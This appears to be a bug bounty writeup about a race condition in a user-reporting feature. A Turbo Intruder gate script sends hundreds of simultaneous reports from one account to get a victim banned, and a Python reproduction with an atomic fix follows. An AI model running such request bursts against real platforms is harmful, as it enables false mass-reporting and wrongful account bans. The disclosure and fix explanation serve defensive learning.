banning users Race condition

What is a race condition?

Multiple requests (or processes) trying to access the same resource at the same time.

Example: you are booking a train ticket online and only a single seat is left (assume seat no. 5). You book a ticket for that seat, and at the same time another person in a different location books the same seat. Both bookings succeed and you both end up with seat no. 5. This kind of issue is called a race condition: multiple requests trying to access the same resource at the same time, with the outcome depending on how they interleave.


As this was a private program, all illustrations of the vulnerability are shown with the host as

The application has a feature to report any person as inappropriate, but you can report a person only once.

To ban any user, at least 100 reports as inappropriate must be made against the account, so I first tried to bypass the rate limit, but that failed.


Visit the user's account and click on Report.

Intercept the request and send it to Turbo Intruder (a Burp plugin by @albinowax).

HTTP request:

POST /user/victim HTTP/1.1
Host: example
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json;charset=utf-8
Content-Length: 22
Connection: keep-alive

{ json data }

Turbo Intruder script (the page's truncated version, completed from Turbo Intruder's standard race template):

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30,
                           requestsPerConnection=100, pipeline=False)
    # 'gate' holds back the last byte of every request until openGate() releases them together
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
    engine.openGate('race1')
    engine.complete(timeout=60)

def handleResponse(req, interesting):
    table.add(req)

Click on Attack. Once I sent this, I noticed that 20 of the requests returned 200 OK.

So I increased the range from 30 to 300 and was able to send more than 100 report requests to the server. After a 3 to 4 hour wait, the victim account was banned.

Reported -> Accepted -> P3 -> $dollar
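To show why the rate limit did not help and what closes the hole, here is an added, self-contained reproduction. It is not code from the original post or from the affected application: `VulnerableReportService` and `HardenedReportService` are hypothetical stand-ins for the report handler, a `threading.Barrier` plays the role of Turbo Intruder's gate so that all requests pass the "already reported?" check before any of them records a report, and the lock plus set in the hardened version stands in for a database unique constraint on (reporter, reported user) with the ban decision counting distinct reporters. The names `reporter-1` and `victim` and the numbers 100 and 300 are taken from or constructed around the writeup.

```python
"""Deterministic reproduction of the report-count race described in the writeup.

Added example with hypothetical stand-ins; not the real application's code.
"""
import threading
from concurrent.futures import ThreadPoolExecutor

BAN_THRESHOLD = 100      # the writeup's "100 plus reports" ban rule
BURST_SIZE = 300         # the writeup's final Turbo Intruder range


class VulnerableReportService:
    """Hypothetical handler: non-atomic check-then-act on a per-target list."""

    def __init__(self, window_hook=lambda: None):
        self.reports = {}        # reported user -> list of reporter ids (duplicates possible)
        self.banned = set()
        self._window_hook = window_hook   # lets the harness widen the race window

    def report(self, reporter, reported):
        seen = self.reports.setdefault(reported, [])
        if reporter in seen:           # time of check: "you can report only once"
            return False
        self._window_hook()            # every racing request is parked here, check passed
        seen.append(reporter)          # time of use: all of them record a report
        if len(seen) >= BAN_THRESHOLD:
            self.banned.add(reported)
        return True


class HardenedReportService:
    """Hypothetical fix: check and insert are one atomic step; bans count distinct reporters.

    The lock plus set stands in for a database UNIQUE(reporter_id, reported_id)
    constraint with an insert-or-ignore; the ban decision counts distinct rows.
    """

    def __init__(self, window_hook=lambda: None):
        self.reports = {}        # reported user -> set of distinct reporter ids
        self.banned = set()
        self._lock = threading.Lock()
        self._window_hook = window_hook

    def report(self, reporter, reported):
        self._window_hook()            # racing requests may all arrive together...
        with self._lock:               # ...but only one at a time gets past here
            seen = self.reports.setdefault(reported, set())
            if reporter in seen:
                return False
            seen.add(reporter)
            if len(seen) >= BAN_THRESHOLD:
                self.banned.add(reported)
            return True


def simulate_burst(service_cls, n_requests=BURST_SIZE):
    """Fire n_requests identical reports from ONE account at the same instant.

    threading.Barrier plays the role of Turbo Intruder's gate: every request
    reaches the hook before any continues, so the interleaving is deterministic.
    """
    gate = threading.Barrier(n_requests)
    service = service_cls(window_hook=gate.wait)
    with ThreadPoolExecutor(max_workers=n_requests) as pool:
        accepted = list(pool.map(lambda _: service.report("reporter-1", "victim"),
                                 range(n_requests)))
    return {
        "accepted": sum(accepted),
        "distinct_reporters": len(set(service.reports["victim"])),
        "banned": "victim" in service.banned,
    }


if __name__ == "__main__":
    for cls in (VulnerableReportService, HardenedReportService):
        print(cls.__name__, simulate_burst(cls))
```

The vulnerable service accepts all 300 reports from a single account and bans the target; the hardened one accepts exactly one. A per-account rate limit cannot fix this class of bug because the racing requests all arrive inside the same window and each one has already passed the duplicate check; the defence is to make the check and the write atomic (a unique constraint or an atomic insert) and to base the ban on the number of distinct reporters.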

2 replies on “banning users Race condition”

To ban any user you need to have (assume 100) reports against the account, and all the reports made should be from different accounts. But the developer was not checking whether the report was made from the same account or a different account, since they had applied a rate limit and thought there was no way to bypass it.
